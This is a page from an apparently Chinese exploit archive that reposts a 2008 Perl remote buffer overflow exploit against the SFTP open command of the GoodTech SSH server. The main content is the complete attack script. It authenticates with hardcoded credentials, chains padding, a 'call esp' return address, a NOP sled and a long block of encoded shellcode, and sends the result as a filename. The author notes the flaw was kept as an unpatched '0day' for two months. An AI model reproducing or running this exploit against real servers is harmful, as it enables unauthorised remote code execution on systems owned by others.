首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GoodTech SSH (SSH_FXP_OPEN) Remote Buffer Overflow Exploit
来源:writ3r [at] gmail.com 作者:r0ut3r 发布时间:2008-10-23  
# GoodTech SSH Remote Buffer Overflow Exploit
# Written by r0ut3r - writ3r [at] gmail.com
#
# SSH_FXP_OPEN command contains a buffer oveflow.
#
# All other operations are also vulnerable, opendir, unlink, etc.
#
# 0day for 2 months :)

use Net::SSH2;

my $user = "root";
my $pass = "yahh";

my $ip = "127.0.0.1";
my $port = 22;

my $ssh2 = Net::SSH2->new();

print "[+] Connecting...\n";
$ssh2->connect($ip, $port) || die "[-] Unable to connect!\n";
$ssh2->auth_password($user, $pass) || "[-] Incorrect credentials\n";
print "[+] Sending payload\n";

my $junk = 'A'x164;
my $eip = "\x49\x13\x9c\x7c"; #call esp
my $nops = "\x90"x20;

my $shellcode =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x33".
"\x2e\x9c\x0e\x83\xeb\xfc\xe2\xf4\xcf\x44\x77\x43\xdb\xd7\x63\xf1".
"\xcc\x4e\x17\x62\x17\x0a\x17\x4b\x0f\xa5\xe0\x0b\x4b\x2f\x73\x85".
"\x7c\x36\x17\x51\x13\x2f\x77\x47\xb8\x1a\x17\x0f\xdd\x1f\x5c\x97".
"\x9f\xaa\x5c\x7a\x34\xef\x56\x03\x32\xec\x77\xfa\x08\x7a\xb8\x26".
"\x46\xcb\x17\x51\x17\x2f\x77\x68\xb8\x22\xd7\x85\x6c\x32\x9d\xe5".
"\x30\x02\x17\x87\x5f\x0a\x80\x6f\xf0\x1f\x47\x6a\xb8\x6d\xac\x85".
"\x73\x22\x17\x7e\x2f\x83\x17\x4e\x3b\x70\xf4\x80\x7d\x20\x70\x5e".
"\xcc\xf8\xfa\x5d\x55\x46\xaf\x3c\x5b\x59\xef\x3c\x6c\x7a\x63\xde".
"\x5b\xe5\x71\xf2\x08\x7e\x63\xd8\x6c\xa7\x79\x68\xb2\xc3\x94\x0c".
"\x66\x44\x9e\xf1\xe3\x46\x45\x07\xc6\x83\xcb\xf1\xe5\x7d\xcf\x5d".
"\x60\x7d\xdf\x5d\x70\x7d\x63\xde\x55\x46\x8d\x52\x55\x7d\x15\xef".
"\xa6\x46\x38\x14\x43\xe9\xcb\xf1\xe5\x44\x8c\x5f\x66\xd1\x4c\x66".
"\x97\x83\xb2\xe7\x64\xd1\x4a\x5d\x66\xd1\x4c\x66\xd6\x67\x1a\x47".
"\x64\xd1\x4a\x5e\x67\x7a\xc9\xf1\xe3\xbd\xf4\xe9\x4a\xe8\xe5\x59".
"\xcc\xf8\xc9\xf1\xe3\x48\xf6\x6a\x55\x46\xff\x63\xba\xcb\xf6\x5e".
"\x6a\x07\x50\x87\xd4\x44\xd8\x87\xd1\x1f\x5c\xfd\x99\xd0\xde\x23".
"\xcd\x6c\xb0\x9d\xbe\x54\xa4\xa5\x98\x85\xf4\x7c\xcd\x9d\x8a\xf1".
"\x46\x6a\x63\xd8\x68\x79\xce\x5f\x62\x7f\xf6\x0f\x62\x7f\xc9\x5f".
"\xcc\xfe\xf4\xa3\xea\x2b\x52\x5d\xcc\xf8\xf6\xf1\xcc\x19\x63\xde".
"\xb8\x79\x60\x8d\xf7\x4a\x63\xd8\x61\xd1\x4c\x66\xdc\xe0\x7c\x6e".
"\x60\xd1\x4a\xf1\xe3\x2e\x9c\x0e";

my $payload = $junk.$eip.$nops.$shellcode;

my $sftp = $ssh2->sftp();
$sftp->open($payload);

print "[+] Sent";
$ssh2->disconnect;

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FreeSSH version 1.2.1 denial o
·LibSPF2 < 1.2.8 DNS TXT Record
·LoudBlog <= 0.8.0a (ajax.php)
·Opera <= 9.60 Stored Cross Sit
·freeSSHd 1.2.1 sftp rename Rem
·Exploits Asterisk 1.4,1.6 et.
·Google-php-include-bugs search
·Opera 9.52/9.60 Stored Cross S
·CSPartner 1.0 (Delete All User
·SilverSHielD 1.0.2.34 (opendir
·MindDezign Photo Gallery 2.2 A
·VLC Media Player TY File Stack
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved